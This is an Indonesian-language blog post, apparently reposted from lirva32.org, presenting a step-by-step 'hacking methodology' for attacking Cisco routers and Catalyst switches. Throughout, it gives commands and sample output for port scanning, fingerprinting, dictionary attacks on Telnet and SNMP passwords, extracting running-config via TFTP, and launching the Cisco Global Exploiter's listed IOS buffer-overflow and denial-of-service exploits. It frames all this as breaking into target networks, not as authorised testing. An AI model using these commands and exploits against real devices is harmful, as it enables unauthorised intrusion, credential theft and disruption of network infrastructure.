CISCO Hacking Methodology


CISCO Hacking Methodology…? Iya, betul sekali materi tersebut yang mau saya bahas karena untuk melakukan penyerangan terhadap jaringan berbasis Router CISCO dan Catalyst CISCO memerlukan sebuah metode yang harus kita lakukan.

CISCO Hacking Methodology…? Iya, betul sekali materi tersebut yang mau saya bahas karena untuk melakukan penyerangan terhadap jaringan berbasis Router CISCO dan Catalyst CISCO memerlukan sebuah metode yang harus kita lakukan.
Ampuhkan metodenya…?? haaaa…ha…..ha…, ini hanya metode... yang namanya metode hanya menjelaskan langkah2 yang bisa dipergunakan untuk menempuh perjalanan hackingnya.Masalah “bobol” atau “tidak” ya sangat bergantung pada penyetingan terhadap perangkat tersebut… tapi tetap berpegang teguh “Nothing System 100% Secure…!!!”.
Mari kita berbicara Methodologi yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis router or catalyst CISCO.
Adapun beberapa metode yang biasa dipergunakan dalam melakukan penyerangan terhadap jaringan berbasis CISCO roter dan catalyst, antara lain :
1. Port Scaning : metoda ini digunakan untuk mengetahui “live host” dalam jaringan yang kita targetkan.
2. Fingerprinting : metoda ini digunakan untuk mendapatkan informasi lebih dari devices yang kita jadikan target
3. Password Guessing : metoda ini biasa digunakan untuk mendapatkan user name dan password terhadap target
4. SNMP Attack : metoda untuk melakukan pengujian dan penyerangan terhadap protokol SNMP.
5. Telnet Attack : metoda untuk melakukan pengujian dan penyerangan terhadap layanan TELNET
6. Web Browser Attack : metoda untuk melakukan pengujian dan penyerangan terhadap HTTP/HTTPS Authentication attack
7. TFTP : metoda untuk melakukan IOS copy dan IOS backup.
8. CISCO Bug : memanfaatkan bug dari IOS yang belum di patch.
Mari kita kenal methodologi tersebut lebih dekat.... biar kita tidak ”galaw” lagi.... kekekkeke....

1. Port Scanning
 nmap
o Proses scanning sangat efektif sekali jika kita melakukan scanning langsung ke CISCO devices dengan melakukan pengecekan langsung pada TCP dan UDP, maka gunakan perintah nmap, sebagai berikut :
- TCP scan: lakukan pengecekan terhadap IP target dan pengecekan terhadap port, mulai dari port 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file TCP.scan.txt.
Perintah yang diperguakan :

nmap  -sT  -O  -v  -p  1-65535  <IP>  -oN  TCP.scan.txt 
 UDP scan: lakukan pengecekan terhadap UDP, mulai dari port 1 – 65535 pada - This will perform a UDP scan, be verbose,  scan ports 1 – 65535 hanya pada IP yang menjadi target saja. Hasil pengecekan akan tersimpan pada file UDP.sca.txt.

Perintah yang dipergunakan :
nmap  -sU  -v  -p  1-65535  <IP>  -oN  UDP.scan.txt 
o CISCOS | ciscos
-    Nah, tool ini merupakan tool yang sangat saya gandungi…ada di Backtrack 4 sampe Bactrack 5 R1 juga masih ada.
ciscos biasa dipakai untuk melakukan pencarian CISCO devices yang ada dalam suatu jaringan dengan memanfaatkan CIDR network range.
Usage: ./ciscos <IP> <class>

2. Fingerprinting
-    Nah, kalo dikalangan underground yang ada tools yang biasa digunakan untuk melakukan fingerprinting terhadap CISCO devices namanya : cisco-torch. Aplikasi ini akan melakukan FingerPrinting terhadap beberapa layanan diantaranya : SSH, Telnet dan HTTP.
# cisco-torch.pl -A 125.125.100.78
List of targets contains 1 host(s) 14489:   
Checking 125.125.100.78... Fingerprint:2552511255251325525324255253311310
Description:Cisco IOS host (tested on 2611, 2950 and Aironet 1200 AP) Fingerprinting Successful 

Cisco-IOS Webserver found   
HTTP/1.1 401 Unauthorized 
Date: Mon, 12 Oct 2011 11:34:11 GMT 
Server: cisco-IOS Accept-Ranges: none 
WWW-Authenticate: Basic realm="level_15_access" 
401 Unauthorized
-    Okay…kita juga bisa pake nmap untuk mengidentifikasi port2 yang terbuka, yang paling harus kita uji adalah port 23 (Telnet), port 80 (HTTP) dan SNMP agent receives requests on UDP port 161 & 162
# nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
# nmap -sV -O -v -p 161,162 <IP> -oN UDP.version.txt

3. Password Guessing
 Nah, kali ini kita akan berhadapan sama tool yang namanya : CAT (Cisco Auditing Tool), biasanya digunakan untuk melakukan dictionary attack terhadap Telnet server dan SNMP agent router dan catalyst CISCO.
# ./CAT  -h  <IP>  -a  password.wordlist
# CAT -h 125.125.100.78 -a /tmp/dict.txt
Guessing passwords:
Invalid Password: 1234 
Invalid Password: latihan 
Invalid Password: cisco 
Password Found: england
-     Ada lagi nih.. yang fungsinya juga sama seperti CAT yaitu : brute-enabler, tools ini memiliki kemampuan untuk melakukan cracking terhadap Telnet. 

# ./enabler <IP> [-u username] -p password /password.wordlist [port]
# ./enabler  125.125.100.78 telnet  /tmp/dict.txt  
[`] OrigEquipMfr... wrong password 
[`] Cisco... wrong password 
[`] agent... wrong password 
[`] all... wrong password 
[`] possible password found: england


4. SNMP Attacks
-    Ayo gan… serang saja protokol SNMP dengan aplikasi yang namanya : CAT (Cisco Auditing Tool). Tools ini mampu mengumpulkan devices cisco dengan cepat dan mampu melakukan password attacking terhadap layanan Telnet dan SNMP agents. Cara pake (baca:pakai) perintahnya gini gan :
# ./CAT  -h  <IP>  -w  SNMP.wordlist
# ./CAT -h 125.125.100.78 -w /tmp/snmp.txt
Checking Host: 125.125.100.78 
Guessing passwords: 
Invalid Password: cisco 
Invalid Password: ciscos 
Found Password : england
-
-
 Gan… yang ini boleh juga dicoba…nama aplikasinya : Onesixtyone. Aplikasi tersebut sangat dapat diandalkan dalam urusan menebak SNMP string community dengan baik. Apabila SNMP string community telah diidentifikasi dengan benar maka akan ditampilkan hasil informasidengan akurat. ’ga percaya gan…??? coba gih buruan…, nih perintahnya gan…:
# onesixtyone  -c  SNMP.wordlist  <IP>
# onesixtyone  -c  dict.txt  125.125.100.78
- Hampir saja ketinggalan nih gan… ada tools namanya : snmpwalk. Snmpwalk merupakan bagian dari SNMP toolkit. Aplikasi ini setelah mengidentifikasi SNMP string community maka akan bekerja untuk mendapatkan informasi berikutnya yaitu SNMP Manegement Information Base (MIB), juga memastikan bahwa yang diperoleh adalah SNMP yang benar dan valid, cara pake tools tersebut gini aza kok gan…ga pake ribet2 :
# snmapwalk  -v  <Version>  -c  <Community string>  <IP>
# snmpwalk -v 1 -c enable 125.125.100.78

5. Telnet
- Kenapa telnet yang diincer…..?? rata2 konfigurasi VTY pada devices CISCO diaktifkan sehingga layanan telnet aktif dan perlu autentikasi user dan password jika layanan tersebut ingin dipergunakan. Nah… user autentikasi inilah yang kita konsentrasikan untuk coba dibobol.
6. Web Browser
- Udah tau belum ga…??? Pasti juragan udah taulah..kalo saat ini juga sudah banyak devices CISCO yang bisa disetting berbasis HTTP/HTTPS. Nah, mari gan…kita konsentrasi untuk memecahkan proses Web base loginnya. BruteForce dan Dictionary Attack sangat membantu dalam proses ini.
7. TFTP
- TFTP…?? Apa lagi tuh gan..?? TFTP itu kependekan dari Trivial File Transfer Protocol. Ya, sebuah aplikasi berbasis layanan FTP yang biasa dipergunakan untuk melakukan proses backup IOS CISCO dan Configurasi IOS CISCO karena lewat backup kita IOS kita bisa mendapatkan password devices.
· Cain & Abel 
Pasti tau dong tool yang 1 ini…berbasis windows lagi…? Kalo ga tau yah kebangetan… Cain & Able bisa digunakan untuk Download dan Upoad CISCO configuration (CCDU), dengan aplikasi ini SNMP RW Community String dan Versi SNMP yang dipergunakan dapat diketahui, kemampuan lainnya adalah mampu melakukan download “running-config” kedalam mesin lokal.
· Kalo berbicara sploit CISCO nih dia gan…namanya : ios-w3-vuln exploits. Sploit ini akan memanfaatkan bug HTTP Access untuk mengambil “running-config” dan memindahkannya ke TFTP server.
 Bagaimana mengekstrak file konfigurasi CISCO…?? Don’t worry be happy gan… cisco-torch mampu melakukannya. 
# ./cisco-torch.pl <options> <IP,hostname,network>
# ./cisco-torch.pl <options> -F <hostlist>

8. Explotasi Bug yang sudah ada
- Attack Tools
o Cisco Global Exploiter (CGE-13): aplikasi ini mampu melakukan penyerangan terhadap beberapa bug CISCO IOS. Ada 14 kemampuan penyerangan yang bisa dilakukan. Bijimane gan…. Bagus kan…? ;)
Perintahnya cuma kayak gini nih gan….:
# perl cge.pl <target> <vulnerability number>
Vulnerability number are :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability 
[2] - Cisco IOS Router Denial of Service Vulnerability 
[3] - Cisco IOS HTTP Auth Vulnerability 
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability 
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability 
[6] - Cisco 675 Web Administration Denial of Service Vulnerability 
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability 
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability 
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability 
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability 
[11] - Cisco Catalyst Memory Leak Vulnerability 
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability 
[13] - 0 Encoding IDS Bypass Vulnerability (UTF) 
[14] - Cisco IOS HTTP Denial of Service Vulnerability
- Buat nyari bug2 baru yang agan2 belum tau… silahkan manfaatin google Common dengan dork seperti ini : http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS, maka kita akan mendapatkan semua informasi tentang Vulnerabilities and Exploits (CVE) Vulnerabilties, tentu juga informasi tentang exploit.

Sumber lirva32.org

2 Responses to "CISCO Hacking Methodology"